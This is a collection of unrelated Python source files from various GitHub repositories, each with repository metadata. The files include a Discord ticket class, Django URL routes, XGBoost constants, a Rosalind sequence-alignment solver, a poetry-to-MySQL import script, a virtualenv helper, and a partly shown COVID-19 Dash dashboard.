6319e3f93e919ca123da06534d536e82dea3256a
[]
no_license
AlchemistsLab/CovalentSupportBot
4db0e8036ff9034b3c11fba9071c6046620b4b33
8204bad64dbe025dcda1c225ce2513d935e7337c
refs/heads/main
2023-06-20T11:05:10.362695
2021-07-14T09:25:55
2021-07-14T09:25:55
386,060,622
1
0
null
null
null
null
UTF-8
Python
false
false
1,379
py
import datetime class Ticket(): def __init__(self, ticketnumber, userid): self._ticketnumber = ticketnumber self._staffmember = None self._userid = userid self._questions_and_response = None self.open() def assign(self, staff): self._staffmember = staff self._status = 'Handling' def open(self): self._status = 'Open' self._date = datetime.datetime.now() self._duration = None def close(self): self._status = 'Closed' self._duration = datetime.datetime.now() - self._date @property def status(self): return self._status @property def ticketnumber(self): return self._ticketnumber @property def userid(self): return self._userid @userid.setter def userid(self, discord_id): self._userid = discord_id @property def staffid(self): if self._staffmember == None: return None return self._staffmember.staffid @property def date(self): return self._date @property def duration(self): return self._duration @property def questions(self): return self._questions_and_response @questions.setter def questions(self, questions): self._questions_and_response = questions
be0321b94907337ffa106f6da1095856ad39c9fa
b66c276111707d8f2444e75e66b8a4fb5b6da733
/backend/base/urls/post_urls.py
446387b5ec901fe4e97d6f966c27b9168c8886ca
[]
no_license
anuupadhyay/CodingHub
27ea15faa68c7d4421c077277d85d7904656cc74
c7aefd7ce751201fde59cfbc8f100d9d5ef7e0cc
refs/heads/master
2023-07-06T20:01:33.701908
2021-08-16T06:48:00
2021-08-16T06:48:00
381,011,689
2
0
null
null
null
null
UTF-8
Python
false
false
186
py
from django.urls import path from base.views import post_views as views urlpatterns = [ path('', views.getPosts, name="posts"), path('<str:pk>/', views.getPost, name="post"), ]
75bf6c3354e8a55ffb564b64b2e850e75902a4ce
3790aba36d7f266a31e1b21d11e2f238e968166b
/XGB/constants.py
a8ea2fa352ee7458a3e12676c7476570524db6be
[]
no_license
gautamverma/MLAnalysisGH
4a6aaad21f3e9f9f9ba560011661857c92163c77
7c46e2ca3358367ae8cf0cdf801f43352295910e
refs/heads/master
2020-12-04T03:42:32.339804
2020-05-06T19:16:50
2020-05-06T19:16:50
231,595,080
0
0
null
null
null
null
UTF-8
Python
false
false
1,772
py
# Batch size of 10000 CHUNKSIZE = 250000 REGRESSION = 'regression' CLASSIFICATION = 'classification' # Default value ACTUAL SIZE 75% TRAIN_ITERATION = 30 TRAIN_MOD_COUNT = 10 CONSTANT_FILLER = 'missing' NUMERIC_FILLER = 0 # All Customer filler ALL_CONSUMER = 'allCustomer' ## Data Input Keys IBUCKET_KEY = 'input_bucket' IPREFIX_KEY = 'input_prefix' IRESULT_PREFIX_KEY = 'result_prefix' IFILES_KEY = 'files' IFOLDER_KEY = 'base_folder' ITRAINING_FP = 'training_file_name' INUMERICAL_COLS = 'numerical_cols' ICATEGORICAL_COLS = 'categorical_cols' IRESULT_COL_KEY = 'result_col' IRESULT_FUNCTION = 'result_function' ISTARTEGY_KEY = 'startegy' IPARAMS_KEY = 'learning_params' ITRAIN_ITERATIONS = 'iterations' ICHUNKSIZE_KEY = 'chunksize' IOBJECTIVE_KEY = 'objective_key' IFILE_PREFIX = "file_prefix" IMODEL_FP = "model_filepath" IMODEL_FN = "model_filename" IMULTIPLE_METRICS_FILES = 'multiple_metric_files' IMULTIPLE_TRAINING_FILE = 'multiple_training_file' NON_MARKETING_FILTERED_FILE = 'non_marketing_filtered_file' PROD_ENVIROMENT_FILTERED_FILE = 'prod_data_filtered_file' PROD_ENVIROMENT_NON_MA_FILTERED_FILE = 'prod_data_and_non_marketing_filtered_file' LEARNING_TYPE = 'learning_type' # Example data imput # data_input = {} # data_input[IBUCKET_KEY] = 'gautam.placement-metrics-prod' # data_input[IFILES_KEY] = [ # 'deep-learning-ds/january/18Jan25JanPMetrics000', # 'deep-learning-ds/january/18Jan25JanPMetadata000', # 'deep-learning-ds/january/18Jan25JanCM000', # 'deep-learning-ds/january/18Jan25JanPP000', # 'deep-learning-ds/january/18Jan25JanCreative000' # ] # data_input[INUMERICAL_COLS] = [] # data_input[ICATEGORICAL_COLS] = [] # # data_input[IFOLDER_KEY] = base_folder # data_input[ITRAINING_FP] = base_folder + '/training_file'
40c5ca732a65d5ae956e19fbce0b726834470f36
80690771010aced98d399c40eb92e109c0624076
/Ros5E_GlobalAlignment.py
8d880f98f02efe48f09f7ccb7f402594df104e09
[]
no_license
ahmdeen/Bioinformatic-Algorthims
f9624a44108ce3978641c168ee30ca1a6ec6fd5d
7cae61bb45535911f220da290f9ecf609b964058
refs/heads/master
2021-01-18T13:58:32.126215
2015-03-25T21:03:59
2015-03-25T21:03:59
27,619,419
0
0
null
null
null
null
UTF-8
Python
false
false
2,248
py
""" Global Alignment Problem Find the highest-scoring alignment between two strings using a scoring matrix. Given: Two protein strings. Return: The maximum alignment score of these strings followed by an alignment achieving this maximum score. """ import os '''Classes''' class blosum62(object): '''Class to score proteins using the BLOSUM62 matrix''' def __init__(self): '''Initalize BLOSUM62 Matrix''' with open(os.path.join(os.path.dirname(__file__), 'DATA/BLOSUM62.txt')) as inFile: lines = [line.strip().split() for line in inFile.readlines()] self.S = {(item[0], item[1]): int(item[2]) for item in lines} def __getitem__(self, pair): '''Returns the score of a given pair''' return self.S[pair[0],pair[1]] '''Functions''' def globalAlignment(seq1, seq2, ScoreMatrix, sig): '''Returns the global alignment of the input sequences utilizing the given ScoringMatrix and indel penalty''' len1, len2 = len(seq1), len(seq2) S = [[0]*(len2+1) for s in xrange(len1+1)] backtrack = [[0]*(len2+1) for bt in xrange(len1+1)] for i in xrange(1, len1+1): S[i][0] = -i*sig for j in xrange(1, len2+1): S[0][j] = -j*sig for i in xrange(1, len1+1): for j in xrange(1, len2+1): scoreList = [S[i-1][j] - sig, S[i][j-1] - sig, S[i-1][j-1] + ScoreMatrix[seq1[i-1], seq2[j-1]]] S[i][j] = max(scoreList) backtrack[i][j] = scoreList.index(S[i][j]) #----- indelInsertFcn = lambda seq, i: seq[:i] + '-' + seq[i:] #----- align1, align2 = seq1, seq2 a, b = len1, len2 maxScore = str(S[a][b]) while a*b != 0: if backtrack[a][b] == 0: a -= 1 align2 = indelInsertFcn(align2, b) elif backtrack[a][b] == 1: b -= 1 align1 = indelInsertFcn(align1, a) else: a -= 1 b -= 1 for i in xrange(a): align2 = indelInsertFcn(align2, 0) for j in xrange(b): align1 = indelInsertFcn(align1, 0) return maxScore, align1, align2 '''Input/Output''' """ seq1 = 'PLEASANTLY' seq2 = 'MEANLY' """ with open('Data/rosalind_5e.txt') as infile: seq1, seq2 = [line.strip() for line in infile.readlines()] indelPenalty = 5 alignment = globalAlignment(seq1,seq2, blosum62(), indelPenalty) answer = '\n'.join(alignment) print answer with open('Ros5E_Answer.txt', 'w') as outfile: outfile.write(answer)
cae9000152e64553d4650ba35f9b7dbeed67727c
f2a0cbbe779ce69743757d95e3bba39c8c10fc78
/中国诗词大会/txt导入数据库.py
8fbad9dbc6ebaea9f1552d0f3cd8611d4075a6da
[]
no_license
xffffffffffff/nickYang
43077a214ed550bb0e2fd7eb41196883551b1909
dfbe3942babd7843e159a9e2b569c975a93bb34c
refs/heads/master
2022-08-04T07:40:17.978237
2020-05-25T04:58:35
2020-05-25T04:58:35
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,912
py
import sys import re import os,time import pymysql conn = pymysql.connect(host='localhost', port=3306, user='root', passwd='newbegin',db='lsj',charset='utf8') cur = conn.cursor(cursor=pymysql.cursors.DictCursor) class WordCreate(): def __init__(self,path): ''' 导入文件进行解析 ''' with open(path,encoding="utf-8") as file: content = file.read() x = re.findall(r'[(|(](.*?)[)|)]', content) print(x) for i in x: zifu = '('+i+')' content = content.replace(zifu,'') content = re.split(r'\d', content) content = [i for i in content if i != ''] self.sc_list = [] for i in content: weak_list = re.split(r'[、。;!?\n\s*]',i) weak_list = [i for i in weak_list if i != ''] self.sc_list.append(weak_list) # print(self.sc_list) def OperationSql(self): num=130 for i in self.sc_list: for _ in range(62-len(i)): #导入诗词为62 导入赏析为61 i.append('NULL') # print(len(i)) num2 = 1 for _ in range(61): sql = "UPDATE poetry SET yiwen_{}='{}' WHERE id ={}".format(num2, i[num2-1], num) print(sql) cur.execute(sql) num2 += 1 # for _ in range(61): # sql = "UPDATE poetry SET sentense_{}='{}' WHERE id ={}".format(num2, i[num2], num) # print(sql) # cur.execute(sql) # num2 += 1 conn.commit() num+=1 def main(): generator = WordCreate('D:\桌面\诗词库-2-赏析.txt') #选择合适的路径 generator.OperationSql() if __name__ == '__main__': main()
40eca71d9ce52576b62b9e0810fe6b9f28fd475f
dd045d8cfe5acb54c23ef6d5c677333a596f15ea
/visAnalytics/urls.py
64e92f761f64bbbf10e9b16fd6825871c6ebc880
[]
no_license
Septien/VA_WebService
e1007c7b6bda3c02c7830bb87b1a9ded71a42060
cd54f3c163d57fa51f320e6f735a4d26f133761a
refs/heads/master
2020-03-21T20:53:07.738341
2018-05-28T16:00:11
2018-05-28T16:00:11
139,034,419
0
0
null
null
null
null
UTF-8
Python
false
false
430
py
from django.urls import path from . import views urlpatterns = [ #https://stackoverflow.com/questions/3711349/django-and-query-string-parameters # The main entry point path('', views.index), # For requesting a script path('script', views.getScript), # For teh ||-coord path(r'pcoordinates', views.parallelCoordinatesHandler), # For the histogram path(r"histogram", views.HistogramHandler), ]
80b6dd5d4f076bb909efb9384c58ede6d4315e41
38d8d88063bd44c34c5c448eafbb343632fe9dfd
/PythonNumpy/array.py
c073f7fb7e70556cd26e991a9d824cee6dee92a5
[]
no_license
ChocolateOriented/mechainLearning
3d1af54e898fc7eb49e1cb94c04e5c22c48458ff
d9242bd1c2552917b0f1c61bb7d97e56eb379fa8
refs/heads/master
2020-03-11T02:23:38.557891
2018-04-20T10:56:12
2018-04-20T10:56:44
null
0
0
null
null
null
null
UTF-8
Python
false
false
120
py
import numpy as np randMat = np.mat(np.random.rand(4,4)); invRandMat = randMat.I print(randMat * invRandMat) np.tile()
16c159d6f2c02f6dc602a3c379faeef88a8d5337
b032efc400f540d31e1728df5817c9779d036387
/venv/bin/python-config
b6ea19279a56f966b4146179e7d7899347706819
[]
no_license
mathv96/bebidas
718f480408a92b00a46559d5cb87084d8b5dac7b
4a469af1373995d6946a95c99907f49f5af38191
refs/heads/master
2021-01-20T21:46:23.738484
2017-08-29T21:55:45
2017-08-29T21:55:45
101,790,592
0
0
null
null
null
null
UTF-8
Python
false
false
2,371
#!/home/matheus96/Documentos/FATEC/Lab.Eng/bebidas/venv/bin/python import sys import getopt import sysconfig valid_opts = ['prefix', 'exec-prefix', 'includes', 'libs', 'cflags', 'ldflags', 'help'] if sys.version_info >= (3, 2): valid_opts.insert(-1, 'extension-suffix') valid_opts.append('abiflags') if sys.version_info >= (3, 3): valid_opts.append('configdir') def exit_with_usage(code=1): sys.stderr.write("Usage: {0} [{1}]\n".format( sys.argv[0], '|'.join('--'+opt for opt in valid_opts))) sys.exit(code) try: opts, args = getopt.getopt(sys.argv[1:], '', valid_opts) except getopt.error: exit_with_usage() if not opts: exit_with_usage() pyver = sysconfig.get_config_var('VERSION') getvar = sysconfig.get_config_var opt_flags = [flag for (flag, val) in opts] if '--help' in opt_flags: exit_with_usage(code=0) for opt in opt_flags: if opt == '--prefix': print(sysconfig.get_config_var('prefix')) elif opt == '--exec-prefix': print(sysconfig.get_config_var('exec_prefix')) elif opt in ('--includes', '--cflags'): flags = ['-I' + sysconfig.get_path('include'), '-I' + sysconfig.get_path('platinclude')] if opt == '--cflags': flags.extend(getvar('CFLAGS').split()) print(' '.join(flags)) elif opt in ('--libs', '--ldflags'): abiflags = getattr(sys, 'abiflags', '') libs = ['-lpython' + pyver + abiflags] libs += getvar('LIBS').split() libs += getvar('SYSLIBS').split() # add the prefix/lib/pythonX.Y/config dir, but only if there is no # shared library in prefix/lib/. if opt == '--ldflags': if not getvar('Py_ENABLE_SHARED'): libs.insert(0, '-L' + getvar('LIBPL')) if not getvar('PYTHONFRAMEWORK'): libs.extend(getvar('LINKFORSHARED').split()) print(' '.join(libs)) elif opt == '--extension-suffix': ext_suffix = sysconfig.get_config_var('EXT_SUFFIX') if ext_suffix is None: ext_suffix = sysconfig.get_config_var('SO') print(ext_suffix) elif opt == '--abiflags': if not getattr(sys, 'abiflags', None): exit_with_usage() print(sys.abiflags) elif opt == '--configdir': print(sysconfig.get_config_var('LIBPL'))
aebaec9b986b01f8e3d1909282c5c696ec7684f6
c2964a5777ab2add5e5c7dddabcd9ee0555482e7
/dash-2019-coronavirus/history_version/app_replaced_20200326.py
770a3e978bcb36c823a998bca156acc2732e45bb
[ "MIT" ]
permissive
lizeyujack/data-visualisation-scripts
b3fdf7e175307493fc6b23e79b63fc42a34cd6a6
d6af7f9a141331378c02417267c4a5f3e114f711
refs/heads/master
2022-04-22T11:12:26.412377
2020-04-25T02:04:20
2020-04-25T02:04:20
258,697,271
1
0
MIT
2020-04-25T05:45:56
2020-04-25T05:45:55
null
UTF-8
Python
false
false
84,070
py
# -*- coding: utf-8 -*- import pandas as pd import numpy as np from datetime import datetime, timedelta import math import os import base64 import plotly.graph_objects as go from plotly.subplots import make_subplots import dash import dash_table import dash_core_components as dcc import dash_html_components as html import dash_bootstrap_components as dbc from dash.dependencies import Input, Output ################################### # Private function ################################### def make_country_table(countryName): '''This is the function for building df for Province/State of a given country''' countryTable = df_latest.loc[df_latest['Country/Region'] == countryName] # Suppress SettingWithCopyWarning pd.options.mode.chained_assignment = None countryTable['Remaining'] = countryTable['Confirmed'] - countryTable['Recovered'] - countryTable['Deaths'] countryTable = countryTable[['Province/State', 'Remaining', 'Confirmed', 'Recovered', 'Deaths', 'lat', 'lon']] countryTable = countryTable.sort_values( by=['Remaining', 'Confirmed'], ascending=False).reset_index(drop=True) # Set row ids pass to selected_row_ids countryTable['id'] = countryTable['Province/State'] countryTable.set_index('id', inplace=True, drop=False) # Turn on SettingWithCopyWarning pd.options.mode.chained_assignment = 'warn' return countryTable def make_europe_table(europe_list): '''This is the function for building df for Europe countries''' europe_table = df_latest.loc[df_latest['Country/Region'].isin(europe_list)] # Suppress SettingWithCopyWarning pd.options.mode.chained_assignment = None europe_table['Remaining'] = europe_table['Confirmed'] - europe_table['Recovered'] - europe_table['Deaths'] europe_table = europe_table[['Country/Region', 'Remaining', 'Confirmed', 'Recovered', 'Deaths', 'lat', 'lon']] europe_table = europe_table.sort_values( by=['Remaining', 'Confirmed'], ascending=False).reset_index(drop=True) # Set row ids pass to selected_row_ids europe_table['id'] = europe_table['Country/Region'] europe_table.set_index('id', inplace=True, drop=False) # Turn on SettingWithCopyWarning pd.options.mode.chained_assignment = 'warn' return europe_table def make_dcc_country_tab(countryName, dataframe): '''This is for generating tab component for country table''' return dcc.Tab(label=countryName, value=countryName, className='custom-tab', selected_className='custom-tab--selected', children=[dash_table.DataTable( id='datatable-interact-location-{}'.format(countryName), # Don't show coordinates columns=[{"name": i, "id": i} for i in dataframe.columns[0:5]], # But still store coordinates in the table for interactivity data=dataframe.to_dict("rows"), row_selectable="single" if countryName != 'Schengen' else False, sort_action="native", style_as_list_view=True, style_cell={'font_family': 'Arial', 'font_size': '1.2rem', 'padding': '.1rem', 'backgroundColor': '#f4f4f2', }, fixed_rows={'headers': True, 'data': 0}, style_table={'minHeight': '800px', 'height': '800px', 'maxHeight': '800px'}, style_header={'backgroundColor': '#f4f4f2', 'fontWeight': 'bold'}, style_cell_conditional=[{'if': {'column_id': 'Province/State'}, 'width': '28%'}, {'if': {'column_id': 'Country/Region'}, 'width': '28%'}, {'if': {'column_id': 'Remaining'}, 'width': '18%'}, {'if': {'column_id': 'Confirmed'}, 'width': '18%'}, {'if': {'column_id': 'Recovered'}, 'width': '18%'}, {'if': {'column_id': 'Deaths'}, 'width': '18%'}, {'if': {'column_id': 'Remaining'}, 'color':'#e36209'}, {'if': {'column_id': 'Confirmed'}, 'color': '#d7191c'}, {'if': {'column_id': 'Recovered'}, 'color': '#1a9622'}, {'if': {'column_id': 'Deaths'}, 'color': '#6c6c6c'}, {'textAlign': 'center'}], ) ] ) ################################################################################ # Data processing ################################################################################ # Method #1 # Import csv file and store each csv in to a df list # NOTE all following steps really rely on the correct order of these csv files in folder raw_data filename = os.listdir('./raw_data/') sheet_name = [i.replace('.csv', '') for i in filename if 'data' not in i and i.endswith('.csv')] sheet_name.sort(reverse=True) # dfs = {sheet_name: pd.read_csv('./raw_data/{}.csv'.format(sheet_name)) # for sheet_name in sheet_name} # Method #2 # Import xls file and store each sheet in to a df list # xl_file = pd.ExcelFile('./data.xls') # dfs = {sheet_name: xl_file.parse(sheet_name) # for sheet_name in xl_file.sheet_names} # Data from each sheet can be accessed via key # keyList = list(dfs.keys()) # Data cleansing # for key, df in dfs.items(): # dfs[key].loc[:,'Confirmed'].fillna(value=0, inplace=True) # dfs[key].loc[:,'Deaths'].fillna(value=0, inplace=True) # dfs[key].loc[:,'Recovered'].fillna(value=0, inplace=True) # dfs[key]=dfs[key].astype({'Confirmed':'int64', 'Deaths':'int64', 'Recovered':'int64'}) # # Change as China for coordinate search # dfs[key]=dfs[key].replace({'Country/Region':'Mainland China'}, 'China') # # Add a zero to the date so can be convert by datetime.strptime as 0-padded date # dfs[key]['Last Update'] = '0' + dfs[key]['Last Update'] # # Convert time as Australian eastern daylight time # dfs[key]['Date_last_updated_AEDT'] = [datetime.strptime(d, '%m/%d/%Y %H:%M') for d in dfs[key]['Last Update']] # dfs[key]['Date_last_updated_AEDT'] = dfs[key]['Date_last_updated_AEDT'] + timedelta(hours=16) # #dfs[key]['Remaining'] = dfs[key]['Confirmed'] - dfs[key]['Recovered'] - dfs[key]['Deaths'] # Add coordinates for each area in the list for the latest table sheet # To save time, coordinates calling was done seperately # Import the data with coordinates df_latest = pd.read_csv('{}_data.csv'.format(sheet_name[0])) df_latest = df_latest.astype({'Date_last_updated_AEDT': 'datetime64'}) # Save numbers into variables to use in the app confirmedCases = df_latest['Confirmed'].sum() deathsCases = df_latest['Deaths'].sum() recoveredCases = df_latest['Recovered'].sum() # Construct confirmed cases dataframe for line plot and 24-hour window case difference df_confirmed = pd.read_csv('./lineplot_data/df_confirmed.csv') df_confirmed = df_confirmed.astype({'Date': 'datetime64'}) plusConfirmedNum = df_confirmed['plusNum'][0] plusPercentNum1 = df_confirmed['plusPercentNum'][0] # Construct recovered cases dataframe for line plot and 24-hour window case difference df_recovered = pd.read_csv('./lineplot_data/df_recovered.csv') df_recovered = df_recovered.astype({'Date': 'datetime64'}) plusRecoveredNum = df_recovered['plusNum'][0] plusPercentNum2 = df_recovered['plusPercentNum'][0] # Construct death case dataframe for line plot and 24-hour window case difference df_deaths = pd.read_csv('./lineplot_data/df_deaths.csv') df_deaths = df_deaths.astype({'Date': 'datetime64'}) plusDeathNum = df_deaths['plusNum'][0] plusPercentNum3 = df_deaths['plusPercentNum'][0] # Construct remaining case dataframe for line plot and 24-hour window case difference df_remaining = pd.read_csv('./lineplot_data/df_remaining.csv') df_remaining = df_remaining.astype({'Date': 'datetime64'}) plusRemainNum = df_remaining['plusNum'][0] plusRemainNum3 = df_remaining['plusPercentNum'][0] # Create data table to show in app # Generate sum values for Country/Region level dfCase = df_latest.groupby(by='Country/Region', sort=False).sum().reset_index() dfCase = dfCase.sort_values( by=['Confirmed'], ascending=False).reset_index(drop=True) # As lat and lon also underwent sum(), which is not desired, remove from this table. dfCase = dfCase.drop(columns=['lat', 'lon']) # Grep lat and lon by the first instance to represent its Country/Region dfGPS = df_latest.groupby( by='Country/Region', sort=False).first().reset_index() dfGPS = dfGPS[['Country/Region', 'lat', 'lon']] # Merge two dataframes dfSum = pd.merge(dfCase, dfGPS, how='inner', on='Country/Region') dfSum = dfSum.replace({'Country/Region': 'China'}, 'Mainland China') dfSum['Remaining'] = dfSum['Confirmed'] - dfSum['Recovered'] - dfSum['Deaths'] # Rearrange columns to correspond to the number plate order dfSum = dfSum[['Country/Region', 'Remaining', 'Confirmed', 'Recovered', 'Deaths', 'lat', 'lon']] # Sort value based on Remaining cases and then Confirmed cases dfSum = dfSum.sort_values( by=['Remaining', 'Confirmed'], ascending=False).reset_index(drop=True) # Set row ids pass to selected_row_ids dfSum['id'] = dfSum['Country/Region'] dfSum.set_index('id', inplace=True, drop=False) # Create tables for tabs CNTable = make_country_table('China') AUSTable = make_country_table('Australia') USTable = make_country_table('US') CANTable = make_country_table('Canada') europe_list = ['Austria', 'Belgium', 'Czechia', 'Denmark', 'Estonia', 'Finland', 'France', 'Germany', 'Greece', 'Hungary', 'Iceland', 'Italy', 'Latvia', 'Liechtenstein', 'Lithuania', 'Luxembourg', 'Malta', 'Netherlands', 'Norway', 'Poland', 'Portugal', 'Slovakia', 'Slovenia', 'Spain', 'Sweden', 'Switzerland'] EuroTable = make_europe_table(europe_list) # Remove dummy row of recovered case number in USTable USTable = USTable.dropna(subset=['Province/State']) # Remove dummy row of recovered case number in USTable CANTable = CANTable.dropna(subset=['Province/State']) # Save numbers into variables to use in the app latestDate = datetime.strftime(df_confirmed['Date'][0], '%b %d, %Y %H:%M AEDT') secondLastDate = datetime.strftime(df_confirmed['Date'][1], '%b %d') daysOutbreak = (df_confirmed['Date'][0] - datetime.strptime('12/31/2019', '%m/%d/%Y')).days # Read cumulative data of a given region from ./cumulative_data folder dfs_curve = pd.read_csv('./lineplot_data/dfs_curve.csv') # Pseduo data for logplot pseduoDay = np.arange(1, daysOutbreak+1) y1 = 100*(1.85)**(pseduoDay-1) # 85% growth rate y2 = 100*(1.35)**(pseduoDay-1) # 35% growth rate y3 = 100*(1.15)**(pseduoDay-1) # 15% growth rate y4 = 100*(1.05)**(pseduoDay-1) # 5% growth rate ############################################################################################# # Start to make plots ############################################################################################# # Line plot for confirmed cases # Set up tick scale based on confirmed case number #tickList = np.arange(0, df_confirmed['Other locations'].max()+5000, 30000) # Create empty figure canvas fig_confirmed = go.Figure() # Add trace to the figure fig_confirmed.add_trace(go.Scatter(x=df_confirmed['Date'], y=df_confirmed['Mainland China'], mode='lines+markers', line_shape='spline', name='Mainland China', line=dict(color='#921113', width=4), marker=dict(size=4, color='#f4f4f2', line=dict(width=1, color='#921113')), text=[datetime.strftime( d, '%b %d %Y AEDT') for d in df_confirmed['Date']], hovertext=['Mainland China confirmed<br>{:,d} cases<br>'.format( i) for i in df_confirmed['Mainland China']], hovertemplate='<b>%{text}</b><br></br>' + '%{hovertext}' + '<extra></extra>')) fig_confirmed.add_trace(go.Scatter(x=df_confirmed['Date'], y=df_confirmed['Other locations'], mode='lines+markers', line_shape='spline', name='Other Region', line=dict(color='#eb5254', width=4), marker=dict(size=4, color='#f4f4f2', line=dict(width=1, color='#eb5254')), text=[datetime.strftime( d, '%b %d %Y AEDT') for d in df_confirmed['Date']], hovertext=['Other region confirmed<br>{:,d} cases<br>'.format( i) for i in df_confirmed['Other locations']], hovertemplate='<b>%{text}</b><br></br>' + '%{hovertext}' + '<extra></extra>')) # Customise layout fig_confirmed.update_layout( # title=dict( # text="<b>Confirmed Cases Timeline<b>", # y=0.96, x=0.5, xanchor='center', yanchor='top', # font=dict(size=20, color="#292929", family="Playfair Display") # ), margin=go.layout.Margin( l=10, r=10, b=10, t=5, pad=0 ), yaxis=dict( showline=False, linecolor='#272e3e', zeroline=False, # showgrid=False, gridcolor='rgba(203, 210, 211,.3)', gridwidth=.1, #tickmode='array', # Set tick range based on the maximum number #tickvals=tickList, # Set tick label accordingly #ticktext=["{:.0f}k".format(i/1000) for i in tickList] ), # yaxis_title="Total Confirmed Case Number", xaxis=dict( showline=False, linecolor='#272e3e', showgrid=False, gridcolor='rgba(203, 210, 211,.3)', gridwidth=.1, zeroline=False ), xaxis_tickformat='%b %d', hovermode='x', legend_orientation="h", # legend=dict(x=.02, y=.95, bgcolor="rgba(0,0,0,0)",), plot_bgcolor='#f4f4f2', paper_bgcolor='#cbd2d3', font=dict(color='#292929', size=10) ) # Line plot for combine recovered cases # Set up tick scale based on total recovered case number #tickList = np.arange(0, df_remaining['Total'].max()+10000, 30000) # Create empty figure canvas fig_combine = go.Figure() # Add trace to the figure fig_combine.add_trace(go.Scatter(x=df_recovered['Date'], y=df_recovered['Total'], mode='lines+markers', line_shape='spline', name='Total Recovered Cases', line=dict(color='#168038', width=4), marker=dict(size=4, color='#f4f4f2', line=dict(width=1, color='#168038')), text=[datetime.strftime( d, '%b %d %Y AEDT') for d in df_recovered['Date']], hovertext=['Total recovered<br>{:,d} cases<br>'.format( i) for i in df_recovered['Total']], hovertemplate='<b>%{text}</b><br></br>' + '%{hovertext}' + '<extra></extra>')) fig_combine.add_trace(go.Scatter(x=df_deaths['Date'], y=df_deaths['Total'], mode='lines+markers', line_shape='spline', name='Total Death Cases', line=dict(color='#626262', width=4), marker=dict(size=4, color='#f4f4f2', line=dict(width=1, color='#626262')), text=[datetime.strftime( d, '%b %d %Y AEDT') for d in df_deaths['Date']], hovertext=['Total death<br>{:,d} cases<br>'.format( i) for i in df_deaths['Total']], hovertemplate='<b>%{text}</b><br></br>' + '%{hovertext}' + '<extra></extra>')) fig_combine.add_trace(go.Scatter(x=df_remaining['Date'], y=df_remaining['Total'], mode='lines+markers', line_shape='spline', name='Total Remaining Cases', line=dict(color='#e36209', width=4), marker=dict(size=4, color='#f4f4f2', line=dict(width=1, color='#e36209')), text=[datetime.strftime( d, '%b %d %Y AEDT') for d in df_deaths['Date']], hovertext=['Total remaining<br>{:,d} cases<br>'.format( i) for i in df_remaining['Total']], hovertemplate='<b>%{text}</b><br></br>' + '%{hovertext}' + '<extra></extra>')) # Customise layout fig_combine.update_layout( margin=go.layout.Margin( l=10, r=10, b=10, t=5, pad=0 ), yaxis=dict( showline=False, linecolor='#272e3e', zeroline=False, # showgrid=False, gridcolor='rgba(203, 210, 211,.3)', gridwidth=.1, #tickmode='array', # Set tick range based on the maximum number #tickvals=tickList, # Set tick label accordingly #ticktext=["{:.0f}k".format(i/1000) for i in tickList] ), # yaxis_title="Total Confirmed Case Number", xaxis=dict( showline=False, linecolor='#272e3e', showgrid=False, gridcolor='rgba(203, 210, 211,.3)', gridwidth=.1, zeroline=False ), xaxis_tickformat='%b %d', hovermode='x', legend_orientation="h", # legend=dict(x=.02, y=.95, bgcolor="rgba(0,0,0,0)",), plot_bgcolor='#f4f4f2', paper_bgcolor='#cbd2d3', font=dict(color='#292929', size=10) ) # Line plot for death rate cases # Set up tick scale based on death case number of Mainland China tickList = np.arange(0, (df_deaths['Other locations']/df_confirmed['Other locations']*100).max()+0.5, 0.5) # Create empty figure canvas fig_rate = go.Figure() # Add trace to the figure fig_rate.add_trace(go.Scatter(x=df_deaths['Date'], y=df_deaths['Mainland China']/df_confirmed['Mainland China']*100, mode='lines+markers', line_shape='spline', name='Mainland China', line=dict(color='#626262', width=4), marker=dict(size=4, color='#f4f4f2', line=dict(width=1, color='#626262')), text=[datetime.strftime( d, '%b %d %Y AEDT') for d in df_deaths['Date']], hovertext=['Mainland China death rate<br>{:.2f}%'.format( i) for i in df_deaths['Mainland China']/df_confirmed['Mainland China']*100], hovertemplate='<b>%{text}</b><br></br>' + '%{hovertext}' + '<extra></extra>')) fig_rate.add_trace(go.Scatter(x=df_deaths['Date'], y=df_deaths['Other locations']/df_confirmed['Other locations']*100, mode='lines+markers', line_shape='spline', name='Other Region', line=dict(color='#a7a7a7', width=4), marker=dict(size=4, color='#f4f4f2', line=dict(width=1, color='#a7a7a7')), text=[datetime.strftime( d, '%b %d %Y AEDT') for d in df_deaths['Date']], hovertext=['Other region death rate<br>{:.2f}%'.format( i) for i in df_deaths['Other locations']/df_confirmed['Other locations']*100], hovertemplate='<b>%{text}</b><br></br>' + '%{hovertext}' + '<extra></extra>')) # Customise layout fig_rate.update_layout( margin=go.layout.Margin( l=10, r=10, b=10, t=5, pad=0 ), yaxis=dict( showline=False, linecolor='#272e3e', zeroline=False, # showgrid=False, gridcolor='rgba(203, 210, 211,.3)', gridwidth=.1, tickmode='array', # Set tick range based on the maximum number tickvals=tickList, # Set tick label accordingly ticktext=['{:.1f}'.format(i) for i in tickList] ), # yaxis_title="Total Confirmed Case Number", xaxis=dict( showline=False, linecolor='#272e3e', showgrid=False, gridcolor='rgba(203, 210, 211,.3)', gridwidth=.1, zeroline=False ), xaxis_tickformat='%b %d', hovermode='x', legend_orientation="h", # legend=dict(x=.02, y=.95, bgcolor="rgba(0,0,0,0)",), plot_bgcolor='#f4f4f2', paper_bgcolor='#cbd2d3', font=dict(color='#292929', size=10) ) # Default cumulative plot for tab # Default plot is an empty canvas #df_region_tab = pd.read_csv('./cumulative_data/{}.csv'.format('The World')) #df_region_tab = df_region_tab.astype({'Date_last_updated_AEDT': 'datetime64', 'date_day': 'datetime64'}) # Create empty figure canvas fig_cumulative_tab = go.Figure() # Add trace to the figure #fig_cumulative_tab.add_trace(go.Scatter(x=df_region_tab['date_day'], # y=df_region_tab['Confirmed'], # mode='lines+markers', # # line_shape='spline', # name='Confirmed case', # line=dict(color='#d7191c', width=2), # # marker=dict(size=4, color='#f4f4f2', # # line=dict(width=1,color='#921113')), # text=[datetime.strftime(d, '%b %d %Y AEDT') for d in df_region_tab['date_day']], # hovertext=['{} Confirmed<br>{:,d} cases<br>'.format('The World', i) for i in df_region_tab['Confirmed']], # hovertemplate='<b>%{text}</b><br></br>' + # '%{hovertext}' + # '<extra></extra>')) #fig_cumulative_tab.add_trace(go.Scatter(x=df_region_tab['date_day'], # y=df_region_tab['Recovered'], # mode='lines+markers', # # line_shape='spline', # name='Recovered case', # line=dict(color='#1a9622', width=2), # # marker=dict(size=4, color='#f4f4f2', # # line=dict(width=1,color='#168038')), # text=[datetime.strftime(d, '%b %d %Y AEDT') for d in df_region_tab['date_day']], # hovertext=['{} Recovered<br>{:,d} cases<br>'.format('The World', i) for i in 